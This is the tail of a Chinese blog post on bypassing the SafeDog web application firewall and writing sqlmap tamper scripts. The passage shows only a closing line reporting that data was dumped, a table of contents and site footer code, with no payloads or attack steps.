<p>最终绕过安全狗成功跑出数据</p>
<p><img src="https://img-blog.csdnimg.cn/20200421092204127.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2dvZF96elo=,size_16,color_FFFFFF,t_70" alt="在这里插入图片描述"></p>

  </div>
</article>



        
          <div id="footer-post-container">
  <div id="footer-post">

    <div id="nav-footer" style="display: none">
      <ul>
         
          <li><a href="/">首页</a></li>
         
          <li><a href="/about/">关于</a></li>
         
          <li><a href="/archives/">归档</a></li>
         
          <li><a href="/categories">分类</a></li>
         
          <li><a href="/projects_url">项目</a></li>
         
          <li><a href="/search/">搜索</a></li>
        
      </ul>
    </div>

    <div id="toc-footer" style="display: none">
      <ol class="toc"><li class="toc-item toc-level-3"><a class="toc-link" href="#文章目录"><span class="toc-number">1.</span> <span class="toc-text">文章目录</span></a></li></ol></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#0x00-简述"><span class="toc-number"></span> <span class="toc-text">0x00 简述</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#0x01-首先我们要判断哪个关键字被拦截了"><span class="toc-number"></span> <span class="toc-text">0x01 首先我们要判断哪个关键字被拦截了</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#0x02-一些简单的知识点"><span class="toc-number"></span> <span class="toc-text">0x02 一些简单的知识点</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#0x03-总结安全狗拦截的点"><span class="toc-number"></span> <span class="toc-text">0x03 总结安全狗拦截的点</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#0x04-Sqlmap-tamper的编写"><span class="toc-number"></span> <span class="toc-text">0x04 Sqlmap tamper的编写</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#0x05-tamper主要的三个部分"><span class="toc-number"></span> <span class="toc-text">0x05 tamper主要的三个部分</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#0x06-tamper编写测试方法"><span class="toc-number"></span> <span class="toc-text">0x06 tamper编写测试方法</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#0x07-结束"><span class="toc-number"></span> <span class="toc-text">0x07 结束</span></a>
    </div>

    <div id="share-footer" style="display: none">
      <ul>
  <li><a class="icon" href="http://www.facebook.com/sharer.php?u=https://godzeo.github.io/2020/04/21/%E4%BB%8E%E7%BB%95%E8%BF%87%E5%AE%89%E5%85%A8%E7%8B%97%E5%88%B0%E7%BC%96%E5%86%99tamper%E8%84%9A%E6%9C%AC/" target="_blank" rel="noopener"><i class="fab fa-facebook fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://twitter.com/share?url=https://godzeo.github.io/2020/04/21/%E4%BB%8E%E7%BB%95%E8%BF%87%E5%AE%89%E5%85%A8%E7%8B%97%E5%88%B0%E7%BC%96%E5%86%99tamper%E8%84%9A%E6%9C%AC/&text=从绕过安全狗到编写tamper脚本" target="_blank" rel="noopener"><i class="fab fa-twitter fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://www.linkedin.com/shareArticle?url=https://godzeo.github.io/2020/04/21/%E4%BB%8E%E7%BB%95%E8%BF%87%E5%AE%89%E5%85%A8%E7%8B%97%E5%88%B0%E7%BC%96%E5%86%99tamper%E8%84%9A%E6%9C%AC/&title=从绕过安全狗到编写tamper脚本" target="_blank" rel="noopener"><i class="fab fa-linkedin fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://pinterest.com/pin/create/bookmarklet/?url=https://godzeo.github.io/2020/04/21/%E4%BB%8E%E7%BB%95%E8%BF%87%E5%AE%89%E5%85%A8%E7%8B%97%E5%88%B0%E7%BC%96%E5%86%99tamper%E8%84%9A%E6%9C%AC/&is_video=false&description=从绕过安全狗到编写tamper脚本" target="_blank" rel="noopener"><i class="fab fa-pinterest fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=从绕过安全狗到编写tamper脚本&body=Check out this article: https://godzeo.github.io/2020/04/21/%E4%BB%8E%E7%BB%95%E8%BF%87%E5%AE%89%E5%85%A8%E7%8B%97%E5%88%B0%E7%BC%96%E5%86%99tamper%E8%84%9A%E6%9C%AC/"><i class="fas fa-envelope fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://getpocket.com/save?url=https://godzeo.github.io/2020/04/21/%E4%BB%8E%E7%BB%95%E8%BF%87%E5%AE%89%E5%85%A8%E7%8B%97%E5%88%B0%E7%BC%96%E5%86%99tamper%E8%84%9A%E6%9C%AC/&title=从绕过安全狗到编写tamper脚本" target="_blank" rel="noopener"><i class="fab fa-get-pocket fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://reddit.com/submit?url=https://godzeo.github.io/2020/04/21/%E4%BB%8E%E7%BB%95%E8%BF%87%E5%AE%89%E5%85%A8%E7%8B%97%E5%88%B0%E7%BC%96%E5%86%99tamper%E8%84%9A%E6%9C%AC/&title=从绕过安全狗到编写tamper脚本" target="_blank" rel="noopener"><i class="fab fa-reddit fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://www.stumbleupon.com/submit?url=https://godzeo.github.io/2020/04/21/%E4%BB%8E%E7%BB%95%E8%BF%87%E5%AE%89%E5%85%A8%E7%8B%97%E5%88%B0%E7%BC%96%E5%86%99tamper%E8%84%9A%E6%9C%AC/&title=从绕过安全狗到编写tamper脚本" target="_blank" rel="noopener"><i class="fab fa-stumbleupon fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://digg.com/submit?url=https://godzeo.github.io/2020/04/21/%E4%BB%8E%E7%BB%95%E8%BF%87%E5%AE%89%E5%85%A8%E7%8B%97%E5%88%B0%E7%BC%96%E5%86%99tamper%E8%84%9A%E6%9C%AC/&title=从绕过安全狗到编写tamper脚本" target="_blank" rel="noopener"><i class="fab fa-digg fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://www.tumblr.com/share/link?url=https://godzeo.github.io/2020/04/21/%E4%BB%8E%E7%BB%95%E8%BF%87%E5%AE%89%E5%85%A8%E7%8B%97%E5%88%B0%E7%BC%96%E5%86%99tamper%E8%84%9A%E6%9C%AC/&name=从绕过安全狗到编写tamper脚本&description=" target="_blank" rel="noopener"><i class="fab fa-tumblr fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://news.ycombinator.com/submitlink?u=https://godzeo.github.io/2020/04/21/%E4%BB%8E%E7%BB%95%E8%BF%87%E5%AE%89%E5%85%A8%E7%8B%97%E5%88%B0%E7%BC%96%E5%86%99tamper%E8%84%9A%E6%9C%AC/&t=从绕过安全狗到编写tamper脚本" target="_blank" rel="noopener"><i class="fab fa-hacker-news fa-lg" aria-hidden="true"></i></a></li>
</ul>

    </div>

    <div id="actions-footer">
        <a id="menu" class="icon" href="#" onclick="$('#nav-footer').toggle();return false;"><i class="fas fa-bars fa-lg" aria-hidden="true"></i> 菜单</a>
        <a id="toc" class="icon" href="#" onclick="$('#toc-footer').toggle();return false;"><i class="fas fa-list fa-lg" aria-hidden="true"></i> 目录</a>
        <a id="share" class="icon" href="#" onclick="$('#share-footer').toggle();return false;"><i class="fas fa-share-alt fa-lg" aria-hidden="true"></i> 分享</a>
        <a id="top" style="display:none" class="icon" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fas fa-chevron-up fa-lg" aria-hidden="true"></i> 返回顶部</a>
    </div>

  </div>
</div>

        
        <footer id="footer">
  <div class="footer-left">
    Copyright &copy;
    
    
    2016-2020
    Zeo
  </div>
  <div class="footer-right">
    <nav>
      <ul>
         
          <li><a href="/">首页</a></li>
         
          <li><a href="/about/">关于</a></li>
         
          <li><a href="/archives/">归档</a></li>
         
          <li><a href="/categories">分类</a></li>
         
          <li><a href="/projects_url">项目</a></li>
         
          <li><a href="/search/">搜索</a></li>
        
      </ul>
    </nav>
  </div>
</footer>

    </div>
    <!-- styles -->

<link rel="stylesheet" href="/lib/font-awesome/css/all.min.css">


<link rel="stylesheet" href="/lib/justified-gallery/css/justifiedGallery.min.css">


    <!-- jquery -->

<script src="/lib/jquery/jquery.min.js"></script>


<script src="/lib/justified-gallery/js/jquery.justifiedGallery.min.js"></script>

<!-- clipboard -->

  
<script src="/lib/clipboard/clipboard.min.js"></script>

  <script type="text/javascript">
  $(function() {
    // copy-btn HTML
    var btn = "<span class=\"btn-copy tooltipped tooltipped-sw\" aria-label=\"复制到粘贴板!\">";
    btn += '<i class="far fa-clone"></i>';
    btn += '</span>'; 
    // mount it!
    $(".highlight table").before(btn);
    var clip = new ClipboardJS('.btn-copy', {
      text: function(trigger) {
        return Array.from(trigger.nextElementSibling.querySelectorAll('.code')).reduce((str,it)=>str+it.innerText+'\n','')
      }
    });
    clip.on('success', function(e) {
      e.trigger.setAttribute('aria-label', "复制成功!");
      e.clearSelection();
    })
  })
  </script>


<script src="/js/main.js"></script>

<!-- search -->

<!-- Google Analytics -->

<!-- Baidu Analytics -->

<!-- Disqus Comments -->


</body>
</html>
